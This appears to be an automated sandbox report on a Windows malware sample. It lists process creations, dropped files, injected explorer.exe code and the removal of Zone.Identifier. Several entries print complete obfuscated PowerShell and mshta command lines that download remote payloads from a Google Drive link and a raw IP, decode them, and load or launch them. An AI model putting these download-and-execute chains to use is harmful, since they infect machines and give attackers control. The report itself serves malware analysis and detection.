'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\wIndowSpOWersHELl\v1.0\powerShELl.ExE" "pOWErSHell -Ex BypAsS -nOp -w 1 -c dEvicECrEDeNtIaldePLoyMenT.EXe ; iex($(IeX('[systEm.TeXt.eNcoDINg]'+[CHaR]58+[Char]0X3a+'utf8.geTsTRinG([sySteM.COnvErT]'+[CHar]58+[cHAr]58+'frOMBaSE64StRING('+[cHaR]34+'JDVnZ0U5NiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRW1iRXJERUZJbmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXUnQsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3d3osc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjRXdqWU8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcVN5cHZwZixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9vUGdpWGNPayk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWNremRUWnd6ZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDVnZ0U5Njo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTM1LjE2Ni82MDAvc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbnN0b2ViZS50SUYiLCIkZU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMiLDAsMCk7c1RBUnQtc0xlRVAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2VudGlyZXRpbWV3aXRoZ3JlYXR0aGlnbi52YlMi'+[cHAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICggKCgnaHl4aW1hZ2VVcmwgPSBRTGVodHRwczovL2RyaXZlLmdvbycrJ2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciBRTGU7aHl4d2ViQ2xpZW50ID0gTmV3LU9iJysnamVjdCAnKydTeXN0ZScrJ20uTmV0LldlYkNsaWUnKydudDtoeXhpbWFnZUJ5dGVzID0gaHl4d2ViQ2xpZW50LkRvdycrJ25sb2FkRCcrJ2F0YShoeXhpbWFnZVVybCk7aHl4aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaHl4aW1hZ2VCeXRlcyk7aHl4c3RhcnRGbGFnID0gUUxlPDxCQVNFNicrJzRfU1RBUlQ+PlFMZTtoeXhlbmRGbGFnID0gUUxlPDxCQVNFNjRfRU5EPj5RTGU7aHl4c3RhcnRJbmRleCA9IGh5eGltJysnYWdlVGV4dC5JbmRleE9mKGh5eHN0YXJ0RmxhZyk7aHl4ZW5kSW5kZXggPSBoeXhpbWFnZVRleHQuSW5kZXhPZihoeXhlbmRGbGFnKTtoeXhzdGFydEluZGV4IC1nZSAwIC1hbmQgaHl4ZW5kSW5kZXggLWd0IGh5eHN0YXJ0SW5kZXg7aHl4c3RhcnRJbmRleCArPSBoeXhzdGFydEZsYWcuTGVuZ3RoO2h5eGJhc2U2NExlbmd0aCA9IGh5eGVuZEknKyduZGV4IC0gaHl4c3RhcnRJbmRleDtoeXhiJysnYXNlNjRDb21tYW5kID0gaHl4aW1hZ2VUZXh0LlN1YnN0cmluZyhoeXhzdGFydEluZGV4LCBoeXhiYXNlNjRMZW5ndGgpO2h5eGJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGh5eGJhJysnc2U2NENvbW1hbmQuVG9DaGEnKydyQXJyYXkoKSBWSjkgRm9yRWFjaC1PYmplY3QgeyBoeXhfIH0pWy0xJysnLi4tKGh5eGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aHl4Y29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhoeXhiYXNlNjRSZXZlcnNlZCk7aHl4bG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMb2FkKCcrJ2h5eGNvbW1hbmRCeXRlJysncyk7aHl4dmFpTWV0aG9kID0gW2QnKydubGliLklPLkhvbWVdLkdldE1ldGgnKydvZChRTGVWQUlRTGUpO2h5eHZhaU1ldGhvZC5JbnZva2UoaHl4bnVsbCwgQChRTGV0eHQuRUVDRlJFLzAwNi82NjEuNTMxLjU0Mi4yNzEvLzpwdHRoUUxlLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVkZXNhdGl2YWQnKydvUUxlJysnLCBRTGVkZXNhdGl2YWRvUUxlLCBRTGVhc3AnKyduZXRfcmVnYnJvd3NlcnNRTGUsIFFMZWRlc2F0aXZhZG9RTGUsIFFMZWRlc2F0aXZhZG9RTGUsUUxlZGVzYXRpdmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZWRlJysnc2F0JysnaXZhZG9RTGUsUUxlZGVzYXRpJysndmFkb1FMZSxRTGVkZXNhdGl2YWRvUUxlLFFMZTFRTGUsUUxlZGVzYXRpdmFkb1FMZSkpOycpLWNyRXBMQUNFICAoW2NoQXJdMTA0K1tjaEFyXTEyMStbY2hBcl0xMjApLFtjaEFyXTM2ICAtckVQTGFDZShbY2hBcl04MStbY2hBcl03NitbY2hBcl0xMDEpLFtjaEFyXTM5IC1yRVBMYUNlJ1ZKOScsW2NoQXJdMTI0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "Iex ( (('hyximageUrl = QLehttps://drive.goo'+'gle.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur QLe;hyxwebClient = New-Ob'+'ject '+'Syste'+'m.Net.WebClie'+'nt;hyximageBytes = hyxwebClient.Dow'+'nloadD'+'ata(hyximageUrl);hyximageText = [System.Text.Encoding]::UTF8.GetString(hyximageBytes);hyxstartFlag = QLe<<BASE6'+'4_START>>QLe;hyxendFlag = QLe<<BASE64_END>>QLe;hyxstartIndex = hyxim'+'ageText.IndexOf(hyxstartFlag);hyxendIndex = hyximageText.IndexOf(hyxendFlag);hyxstartIndex -ge 0 -and hyxendIndex -gt hyxstartIndex;hyxstartIndex += hyxstartFlag.Length;hyxbase64Length = hyxendI'+'ndex - hyxstartIndex;hyxb'+'ase64Command = hyximageText.Substring(hyxstartIndex, hyxbase64Length);hyxbase64Reversed = -join (hyxba'+'se64Command.ToCha'+'rArray() VJ9 ForEach-Object { hyx_ })[-1'+'..-(hyxbase64Command.Length)];hyxcommandByt'+'es = [System.Convert]::FromBase64String(hyxbase64Reversed);hyxloadedAssembly = [System.Reflection.Assembly'+']::Load('+'hyxcommandByte'+'s);hyxvaiMethod = [d'+'nlib.IO.Home].GetMeth'+'od(QLeVAIQLe);hyxvaiMethod.Invoke(hyxnull, @(QLetxt.EECFRE/006/661.531.542.271//:ptthQLe, QLedesativadoQLe, QLedesativad'+'oQLe'+', QLedesativadoQLe, QLeasp'+'net_regbrowsersQLe, QLedesativadoQLe, QLedesativadoQLe,QLedesativadoQLe,QLedesativadoQLe,QLede'+'sat'+'ivadoQLe,QLedesati'+'vadoQLe,QLedesativadoQLe,QLe1QLe,QLedesativadoQLe));')-crEpLACE ([chAr]104+[chAr]121+[chAr]120),[chAr]36 -rEPLaCe([chAr]81+[chAr]76+[chAr]101),[chAr]39 -rEPLaCe'VJ9',[chAr]124))"	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.cmdline"			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 19_2_029D9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

19_2_029D9247

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_04E75662 push eax; iretd	3_2_04E75699
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_0040134A pushfd ; retf	13_2_00401353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 13_2_004012F2 pushfd ; retf	13_2_004012F3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 19_3_057A9711 push eax; ret	19_3_057A971D
Source: C:\Windows\explorer.exe	Code function: 20_2_00FDA055 push es; iretd	20_2_00FDA05D
Source: C:\Windows\explorer.exe	Code function: 20_2_00FD14D4 push esi; ret	20_2_00FD14D6
Source: C:\Windows\explorer.exe	Code function: 20_2_00FD47A7 push esp; iretd	20_2_00FD47A8
Source: C:\Windows\explorer.exe	Code function: 20_2_00FD1405 push esi; ret	20_2_00FD1407
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_0320967E push ds; retf	21_2_03209680
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_032094E6 push edx; ret	21_2_032094E7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 21_2_032038A7 push esp; iretd	21_2_032038A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C287CE push es; ret	22_2_02C28A18
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 22_2_02C28EEF push edi; ret	22_2_02C28EF0
Source: C:\Windows\explorer.exe	Code function: 23_2_00A014D4 push esi; ret	23_2_00A014D6
Source: C:\Windows\explorer.exe	Code function: 23_2_00A01405 push esi; ret	23_2_00A01407
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 24_2_02A23417 push esp; iretd	24_2_02A23418
Source: C:\Windows\explorer.exe	Code function: 28_2_00141405 push esi; ret	28_2_00141407
Source: C:\Windows\explorer.exe	Code function: 28_2_001445A7 push esp; iretd	28_2_001445A8
Source: C:\Windows\explorer.exe	Code function: 28_2_001414D4 push esi; ret	28_2_001414D6
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 30_2_00153627 push esp; iretd	30_2_00153628
Source: C:\Windows\explorer.exe	Code function: 31_2_00AC1405 push esi; ret	31_2_00AC1407
Source: C:\Windows\explorer.exe	Code function: 31_2_00AC4817 push esp; iretd	31_2_00AC4818
Source: C:\Windows\explorer.exe	Code function: 31_2_00AC14D4 push esi; ret	31_2_00AC14D6
Source: C:\Windows\explorer.exe	Code function: 31_2_00ACAC8D push esp; iretd	31_2_00ACAC95
Source: C:\Windows\explorer.exe	Code function: 31_2_00ACAAD2 push ebp; iretd	31_2_00ACAAD3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\zrs0mlof\zrs0mlof.dll			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\wihaduv			Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\wihaduv

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\wihaduv:Zone.Identifier read attributes | delete

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 22_2_02C23862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,

22_2_02C23862

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
